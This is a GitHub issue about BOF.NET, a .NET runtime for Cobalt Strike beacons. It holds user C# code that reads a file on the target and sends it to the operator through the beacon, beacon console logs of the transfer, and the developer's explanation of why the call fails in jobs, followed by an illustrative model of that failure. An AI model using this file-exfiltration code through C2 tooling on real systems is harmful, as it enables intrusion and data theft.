CCob / BOF.NET

A .NET Runtime for Cobalt Strike's Beacon Object Files

DownloadFile() not working with bofnet_job #2

Open williamknows opened 3 years ago

williamknows commented 3 years ago

Hey,

Really appreciate the effort that's gone into supporting the undocumented BOF functionality.

I've run into an issue with DownloadFile(). It appears to work fine with bofnet_execute but throws a NullReferenceException error with bofnet_job. This may be down to the way I'm using it. If so, would appreciate some code samples on usage if you have the time.

Test Code

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using BOFNET;

namespace BOFNET_TestFileDownload
{
    class Program : BeaconObject
    {
        public Program(BeaconApi api) : base(api) { }
        public override void Go(string[] args)
        {
            MemoryStream ms = new MemoryStream();
            using (FileStream file = new FileStream(@"C:\temp\Testing.txt", FileMode.Open, FileAccess.Read))
                file.CopyTo(ms);
            ms.Position = 0;
            DownloadFile("testfile.txt", ms);
            ms.Close();

            BeaconConsole.WriteLine($"[+] File sent!");
        }

        static void Main(string[] args)
        {
        }
    }
}

Output

beacon> bofnet_execute BOFNET_TestFileDownload.Program
[*] Attempting to execute BOFNET BOFNET_TestFileDownload.Program
[+] host called home, sent: 6809 bytes
[*] started download of testfile.txt (24 bytes)
[*] download of testfile.txt is complete
[+] received output:
[+] File sent!

beacon> bofnet_job BOFNET_TestFileDownload.Program
[*] Attempting to start BOFNET BOFNET_TestFileDownload.Program as a job
[+] host called home, sent: 6836 bytes
[+] received output:
[+] Started Task BOFNET_TestFileDownload.Program with job id 4

beacon> bofnet_jobstatus 4
[*] Attempting to execute BOFNET BOFNET.Bofs.Jobs.JobStatus
[+] host called home, sent: 6808 bytes
[+] received output:
Type: Program, Id: 4, Active: False, Console Data: True
Job execution failed with exception:
System.NullReferenceException: Object reference not set to an instance of an object.
   at BOFNET.BeaconObject.DownloadFile(String fileName, Stream fileData)
   at BOFNET_TestFileDownload.Program.Go(String[] args)
   at BOFNET.BeaconJob.DoTask(Object args)

[+] Job completed and console drained, removing from active job list

CCob commented 3 years ago

Unfortunately it won't work as a job. The native BOF runtime is long gone when you start a job so you can't use any of the BOF APIs. It works for console output because it's cached and is only spewed out during a call to bofnet_jobstatus. I should put guard rails in place to prevent these undocumented extensions from working in a job.
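
A minimal model of the lifetime problem described in the reply above, added here as an illustration; it is not BOF.NET's code, and `NativeApi`, `ModelObject`, `Sample` and `Demo` are hypothetical names. It assumes the native callback is cleared once the synchronous entry point returns, and shows why buffered console output survives a job while a call into the native side does not, with a guard rail that replaces the NullReferenceException with a descriptive error.

```csharp
using System;
using System.Text;
using System.Threading;

// Hypothetical model, not BOF.NET code: the native callback exists only
// while the synchronous entry point is running (assumption of this example).
sealed class NativeApi
{
    public Action<string, byte[]> Download;   // set on entry, cleared on return
}

abstract class ModelObject
{
    readonly NativeApi api;
    readonly StringBuilder console = new StringBuilder();
    protected ModelObject(NativeApi api) { this.api = api; }

    // Console output is buffered in managed memory, so it survives until drained.
    protected void WriteLine(string s) { lock (console) console.AppendLine(s); }
    public string Drain() { lock (console) { var s = console.ToString(); console.Clear(); return s; } }

    // Guard rail: a descriptive error instead of a NullReferenceException.
    protected void DownloadFile(string name, byte[] data)
    {
        var cb = api.Download ?? throw new InvalidOperationException(
            "DownloadFile needs the native runtime, which is not available inside a job");
        cb(name, data);
    }
    public abstract void Go();
}

sealed class Sample : ModelObject
{
    public Sample(NativeApi api) : base(api) { }
    public override void Go() { WriteLine("[+] starting"); DownloadFile("testfile.txt", new byte[24]); WriteLine("[+] File sent!"); }
}

static class Demo
{
    static void Main()
    {
        var api = new NativeApi { Download = (n, d) => Console.WriteLine($"native: {n} ({d.Length} bytes)") };
        new Sample(api).Go();                      // synchronous call: callback is live
        var job = new Sample(api);
        Exception error = null;
        var t = new Thread(() => { try { job.Go(); } catch (Exception e) { error = e; } });
        api.Download = null;                       // entry point returned, native side gone
        t.Start(); t.Join();
        Console.Write(job.Drain());                // cached output still arrives later
        Console.WriteLine(error?.Message);         // guard rail message, not an NRE
    }
}
```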